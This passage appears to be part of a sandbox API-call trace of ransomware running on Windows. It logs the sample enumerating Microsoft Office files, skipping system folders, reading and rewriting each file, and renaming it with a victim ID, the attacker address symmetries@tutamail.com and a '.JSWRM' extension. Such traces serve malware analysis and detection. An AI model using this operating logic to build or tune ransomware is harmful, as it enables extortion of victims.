Office\\root\\mcxml\\x-none\\Outlook.x-none.msi.16_PostCommon.Outlook.x-none.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\outlook.x-none.msi.16_postcommon.outlook.x-none.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.348] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=894) returned 1 [0113.348] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.348] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x370) returned 0x20e550 [0113.349] ReadFile (in: hFile=0x238, lpBuffer=0x20e550, nNumberOfBytesToRead=0x370, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x370, lpOverlapped=0x0) returned 1 [0113.357] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.357] WriteFile (in: hFile=0x238, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x370, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x370, lpOverlapped=0x0) returned 1 [0113.357] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0113.357] CloseHandle (hObject=0x238) returned 1 [0113.357] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22bbc0 [0113.357] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.357] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0113.357] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.357] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0113.357] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0113.357] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.357] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1c8 [0113.357] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1c8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.357] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1c8 | out: hHeap=0x1e0000) returned 1 [0113.357] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b398 [0113.357] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0113.357] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b398 | out: hHeap=0x1e0000) returned 1 [0113.357] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0113.358] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Outlook.x-none.msi.16_PostCommon.Outlook.x-none.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\outlook.x-none.msi.16_postcommon.outlook.x-none.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\Outlook.x-none.msi.16_PostCommon.Outlook.x-none.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\outlook.x-none.msi.16_postcommon.outlook.x-none.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.358] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0113.358] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bbc0 | out: hHeap=0x1e0000) returned 1 [0113.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0113.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0113.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0113.359] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x117f066f, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x117f066f, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x128ed2a1, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2504a2, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="PowerPivot.x-none.msi.16_mondoww.mcxml", cAlternateFileName="POWERP~1.MCX")) returned 1 [0113.359] lstrcmpiW (lpString1="PowerPivot.x-none.msi.16_mondoww.mcxml", lpString2=".") returned 1 [0113.359] lstrcmpiW (lpString1="PowerPivot.x-none.msi.16_mondoww.mcxml", lpString2="..") returned 1 [0113.359] lstrcmpiW (lpString1="PowerPivot.x-none.msi.16_mondoww.mcxml", lpString2="...") returned 1 [0113.359] lstrcmpiW (lpString1="PowerPivot.x-none.msi.16_mondoww.mcxml", lpString2="windows") returned -1 [0113.359] lstrcmpiW (lpString1="PowerPivot.x-none.msi.16_mondoww.mcxml", lpString2="recovery") returned -1 [0113.359] lstrcmpiW (lpString1="PowerPivot.x-none.msi.16_mondoww.mcxml", lpString2="perflogs") returned 1 [0113.359] lstrcmpiW (lpString1="PowerPivot.x-none.msi.16_mondoww.mcxml", lpString2="documents and settings") returned 1 [0113.359] lstrcmpiW (lpString1="PowerPivot.x-none.msi.16_mondoww.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0113.359] lstrcmpiW (lpString1="PowerPivot.x-none.msi.16_mondoww.mcxml", lpString2="system volume information") returned -1 [0113.359] lstrcmpiW (lpString1="PowerPivot.x-none.msi.16_mondoww.mcxml", lpString2="msocache") returned 1 [0113.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bd50 [0113.359] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivot.x-none.msi.16_mondoww.mcxml", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0113.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0113.359] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivot.x-none.msi.16_mondoww.mcxml", cchWideChar=38, lpMultiByteStr=0x22ce70, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPivot.x-none.msi.16_mondoww.mcxml", lpUsedDefaultChar=0x0) returned 38 [0113.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bd50 | out: hHeap=0x1e0000) returned 1 [0113.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c698 [0113.359] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivot.x-none.msi.16_mondoww.mcxml", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0113.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.359] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPivot.x-none.msi.16_mondoww.mcxml", cchWideChar=38, lpMultiByteStr=0x22cdc8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPivot.x-none.msi.16_mondoww.mcxml", lpUsedDefaultChar=0x0) returned 38 [0113.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c698 | out: hHeap=0x1e0000) returned 1 [0113.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0113.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0113.359] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.359] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.359] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bc18 [0113.359] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\PowerPivot.x-none.msi.16_mondoww.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\powerpivot.x-none.msi.16_mondoww.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.360] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2426018) returned 1 [0113.360] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.360] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0113.360] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0113.373] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.373] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0113.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0113.374] CloseHandle (hObject=0x238) returned 1 [0113.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0113.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0113.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0113.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0113.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0113.374] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0113.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c0c8 [0113.374] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f3a8 [0113.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c0c8 | out: hHeap=0x1e0000) returned 1 [0113.374] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0113.374] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\PowerPivot.x-none.msi.16_mondoww.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\powerpivot.x-none.msi.16_mondoww.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\PowerPivot.x-none.msi.16_mondoww.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\powerpivot.x-none.msi.16_mondoww.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.376] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f3a8 | out: hHeap=0x1e0000) returned 1 [0113.376] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0113.376] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bc18 | out: hHeap=0x1e0000) returned 1 [0113.376] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0113.376] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0113.376] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x123438ef, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x123438ef, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x128a0e2b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x12801a, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="PowerPoint.x-none.msi.16_mondoww.mcxml", cAlternateFileName="POWERP~2.MCX")) returned 1 [0113.376] lstrcmpiW (lpString1="PowerPoint.x-none.msi.16_mondoww.mcxml", lpString2=".") returned 1 [0113.376] lstrcmpiW (lpString1="PowerPoint.x-none.msi.16_mondoww.mcxml", lpString2="..") returned 1 [0113.376] lstrcmpiW (lpString1="PowerPoint.x-none.msi.16_mondoww.mcxml", lpString2="...") returned 1 [0113.376] lstrcmpiW (lpString1="PowerPoint.x-none.msi.16_mondoww.mcxml", lpString2="windows") returned -1 [0113.376] lstrcmpiW (lpString1="PowerPoint.x-none.msi.16_mondoww.mcxml", lpString2="recovery") returned -1 [0113.376] lstrcmpiW (lpString1="PowerPoint.x-none.msi.16_mondoww.mcxml", lpString2="perflogs") returned 1 [0113.376] lstrcmpiW (lpString1="PowerPoint.x-none.msi.16_mondoww.mcxml", lpString2="documents and settings") returned 1 [0113.376] lstrcmpiW (lpString1="PowerPoint.x-none.msi.16_mondoww.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0113.376] lstrcmpiW (lpString1="PowerPoint.x-none.msi.16_mondoww.mcxml", lpString2="system volume information") returned -1 [0113.376] lstrcmpiW (lpString1="PowerPoint.x-none.msi.16_mondoww.mcxml", lpString2="msocache") returned 1 [0113.376] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0113.376] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPoint.x-none.msi.16_mondoww.mcxml", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0113.376] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0113.376] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPoint.x-none.msi.16_mondoww.mcxml", cchWideChar=38, lpMultiByteStr=0x22d0a0, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPoint.x-none.msi.16_mondoww.mcxml", lpUsedDefaultChar=0x0) returned 38 [0113.376] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0113.377] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bf60 [0113.377] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPoint.x-none.msi.16_mondoww.mcxml", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0113.377] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0113.377] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerPoint.x-none.msi.16_mondoww.mcxml", cchWideChar=38, lpMultiByteStr=0x22d0d8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerPoint.x-none.msi.16_mondoww.mcxml", lpUsedDefaultChar=0x0) returned 38 [0113.377] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0113.377] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24c0c8 [0113.377] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0113.377] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0113.377] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0113.377] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b510 [0113.377] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\PowerPoint.x-none.msi.16_mondoww.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\powerpoint.x-none.msi.16_mondoww.mcxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0113.377] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=1212442) returned 1 [0113.377] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24c1d0 [0113.378] ReadFile (in: hFile=0x238, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0113.392] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0113.392] WriteFile (in: hFile=0x238, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0113.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0113.393] CloseHandle (hObject=0x238) returned 1 [0113.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0113.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0113.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0113.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0113.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0113.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0113.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0113.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2a0 [0113.393] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2a0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0113.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2a0 | out: hHeap=0x1e0000) returned 1 [0113.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b380 [0113.393] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f4d0 [0113.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b380 | out: hHeap=0x1e0000) returned 1 [0113.393] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0113.393] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\PowerPoint.x-none.msi.16_mondoww.mcxml" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\powerpoint.x-none.msi.16_mondoww.mcxml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\mcxml\\x-none\\PowerPoint.x-none.msi.16_mondoww.mcxml.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\mcxml\\x-none\\powerpoint.x-none.msi.16_mondoww.mcxml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0113.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f4d0 | out: hHeap=0x1e0000) returned 1 [0113.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0113.394] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b510 | out: hHeap=0x1e0000) returned 1 [0113.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0113.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0113.395] FindNextFileW (in: hFindFile=0x231c40, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x3b9607ff, ftCreationTime.dwHighDateTime=0x1d47c34, ftLastAccessTime.dwLowDateTime=0x3b9607ff, ftLastAccessTime.dwHighDateTime=0x1d47c34, ftLastWriteTime.dwLowDateTime=0x3c29db74, ftLastWriteTime.dwHighDateTime=0x1d47c34, nFileSizeHigh=0x0, nFileSizeLow=0xca698, dwReserved0=0x60002, dwReserved1=0x2097ea, cFileName="Project.x-none.msi.16_mondoww.mcxml", cAlternateFileName="PROJEC~1.MCX")) returned 1 [0113.395] lstrcmpiW (lpString1="Project.x-none.msi.16_mondoww.mcxml", lpString2=".") returned 1 [0113.395] lstrcmpiW (lpString1="Project.x-none.msi.16_mondoww.mcxml", lpString2="..") returned 1 [0113.395] lstrcmpiW (lpString1="Project.x-none.msi.16_mondoww.mcxml", lpString2="...") returned 1 [0113.395] lstrcmpiW (lpString1="Project.x-none.msi.16_mondoww.mcxml", lpString2="windows") returned -1 [0113.395] lstrcmpiW (lpString1="Project.x-none.msi.16_mondoww.mcxml", lpString2="recovery") returned -1 [0113.395] lstrcmpiW (lpString1="Project.x-none.msi.16_mondoww.mcxml", lpString2="perflogs") returned 1 [0113.395] lstrcmpiW (lpString1="Project.x-none.msi.16_mondoww.mcxml", lpString2="documents and settings") returned 1 [0113.395] lstrcmpiW (lpString1="Project.x-none.msi.16_mondoww.mcxml", lpString2="$RECYCLE.BIN") returned 1 [0113.395] lstrcmpiW (lpString1="Project.x-none.msi.16_mondoww.mcxml", lpString2="system volume information") returned -1 [0113.395] lstrcmpiW (lpString1="Project.x-none.msi.16_mondoww.mcxml", lpString2="msocache") returned 1 [0113.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0113.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Project.x-none.msi.16_mondoww.mcxml", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0113.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0113.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Project.x-none.msi.16_mondoww.mcxml", cchWideChar=35, lpMultiByteStr=0x22cdc8, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Project.x-none.msi.16_mondoww.mcxml", lpUsedDefaultChar=0x0) returned 35 [0113.395] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0113.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0113.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Project.x-none.msi.16_mondoww.mcxml", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0113.395] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0113.395] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Project.x-none.msi.16_mondoww.mcxml", cchWideChar=35, lpMultiByteStr=0x22d0a0, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 